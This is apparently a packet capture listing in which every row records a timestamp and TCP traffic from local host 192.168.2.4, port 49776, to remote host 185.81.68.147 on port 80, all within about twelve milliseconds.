Dec 13, 2024 07:47:45.850663900 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850692987 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850716114 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850804090 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850804090 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850828886 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850848913 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850878000 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850945950 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.850977898 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851000071 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851027012 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851048946 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851078033 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851099014 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851130962 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851156950 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851186037 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851205111 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851233006 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851402044 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851432085 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851454973 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851480961 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851501942 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851532936 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851557970 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851588011 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851615906 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851644039 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851665974 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851696014 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851717949 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851744890 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851766109 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851793051 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851813078 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851845026 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851867914 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851900101 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851919889 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851948023 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.851977110 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852005959 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852026939 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852052927 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852077007 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852106094 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852123976 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852152109 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852170944 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852197886 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852221012 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852354050 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852399111 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852426052 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852456093 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852483988 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852552891 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852576017 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852603912 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852626085 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852689981 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852711916 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852737904 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852762938 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852788925 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852811098 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852842093 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852905035 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852938890 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852966070 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.852993965 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853013992 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853040934 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853063107 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853089094 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853111029 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853137016 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853161097 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853187084 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853214979 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853388071 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853411913 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853446007 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853470087 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853502035 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853526115 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853553057 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853573084 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853599072 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853621006 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853648901 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853671074 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853701115 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853720903 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853754044 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853775978 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853806019 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853837967 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853868961 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853888988 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853916883 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853936911 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853964090 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.853984118 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854011059 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854037046 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854063034 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854083061 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854114056 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854132891 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854165077 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854264021 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854293108 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854315042 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854381084 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854409933 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854437113 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854496956 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854525089 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854549885 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854638100 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854676962 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854698896 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854727030 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854757071 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854927063 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854948997 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854975939 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.854998112 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855029106 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855051041 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855083942 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855107069 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855139017 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855159998 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855189085 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855282068 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855309010 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855339050 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855360985 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855428934 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855458975 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855479956 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855506897 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855529070 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855557919 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855582952 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855613947 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855675936 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855705976 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855725050 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855752945 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855813026 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855843067 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855866909 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855921984 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.855950117 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856139898 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856168032 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856189013 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856219053 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856244087 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856271982 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856291056 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856317043 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856338978 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856364965 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856386900 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856414080 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856503963 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856535912 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856558084 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856586933 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856607914 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856640100 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856666088 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856693983 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856714964 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856740952 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856760979 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856789112 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856812000 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856837034 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856861115 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856888056 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856921911 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856949091 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.856970072 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857007027 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857070923 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857103109 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857126951 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857213020 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857254982 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857319117 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857352972 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857374907 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857402086 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857423067 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857450962 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857620001 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857651949 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857676983 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857709885 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857734919 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857764006 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857784033 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857810020 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857836008 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857865095 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857886076 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857911110 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857930899 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857958078 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.857979059 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858010054 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858031988 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858058929 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858082056 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858109951 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858134031 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858159065 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858181000 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858206987 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858227968 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858254910 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858274937 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858300924 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858320951 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858346939 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858372927 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858405113 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858426094 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858452082 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858474016 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858500957 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858520031 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858549118 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858566999 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858592987 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858614922 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858639956 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858661890 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858686924 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858712912 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858745098 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858766079 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858795881 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858814955 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858844995 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858866930 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858894110 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858913898 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.858941078 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859035969 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859066010 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859086037 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859153032 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859206915 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859245062 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859304905 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859338045 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859359980 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859385967 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859476089 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859476089 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859498978 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859519005 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859546900 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859570026 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859601974 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859875917 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859915972 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859950066 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.859982967 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860008955 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860038996 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860059977 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860086918 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860109091 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860137939 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860167027 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860269070 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860289097 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860317945 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860414028 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860414028 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860445976 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860513926 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860543966 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860565901 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860595942 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860661030 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860691071 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860711098 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860743999 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860764027 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860790968 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860960007 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.860990047 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861012936 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861044884 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861071110 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861107111 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861129045 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861157894 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861179113 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861207008 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861228943 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861378908 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861402035 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861421108 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861449003 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861469984 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861496925 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861532927 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861605883 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861627102 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861663103 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861726046 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861754894 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861776114 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861804962 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861865997 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861898899 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861917019 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861947060 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861965895 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.861991882 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862011909 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862041950 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862062931 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862091064 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862263918 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862293959 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862317085 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862343073 CET	49776	80	192.168.2.4	185.81.68.147
Dec 13, 2024 07:47:45.862364054 CET	49776	80	192.168.2.4	185.81.68.147
